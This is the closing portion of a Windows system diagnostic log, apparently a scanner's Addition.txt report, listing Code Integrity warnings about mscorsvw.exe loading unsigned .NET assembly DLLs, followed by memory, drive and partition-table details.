Date: 2016-10-06 10:12:30.757
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume1\Windows\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\MSDATASRC.dll that did not meet the Microsoft signing level requirements.
Date: 2016-10-06 10:12:30.644
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume1\Windows\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.
Date: 2016-10-06 10:12:30.600
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume1\Windows\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\MSDATASRC.dll that did not meet the Microsoft signing level requirements.
Date: 2016-10-06 10:12:28.471
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume1\Windows\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll that did not meet the Microsoft signing level requirements.
Date: 2016-10-06 10:12:27.843
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume1\Windows\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll that did not meet the Microsoft signing level requirements.
==================== Memory info ===========================
Processor: Intel® Core i3 CPU M 370 @ 2.40GHz
Percentage of memory in use: 72%
Total physical RAM: 1780.36 MB
Available physical RAM: 497.29 MB
Total Virtual: 3572.36 MB
Available Virtual: 1713.03 MB
==================== Drives ================================
Drive c: (system) (Fixed) (Total:157.2 GB) (Free:11.94 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (data) (Fixed) (Total:140.44 GB) (Free:21.74 GB) NTFS
Drive h: (SORIN 3_6GB) (Removable) (Total:3.67 GB) (Free:0.17 GB) FAT32
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 8C41C3FA)
Partition 1: (Active) - (Size=157.2 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=450 MB) - (Type=27)
Partition 3: (Not Active) - (Size=140.4 GB) - (Type=07 NTFS)
========================================================
Disk: 1 (Size: 3.7 GB) (Disk ID: 00000000)
Partition: GPT.
==================== End of Addition.txt ============================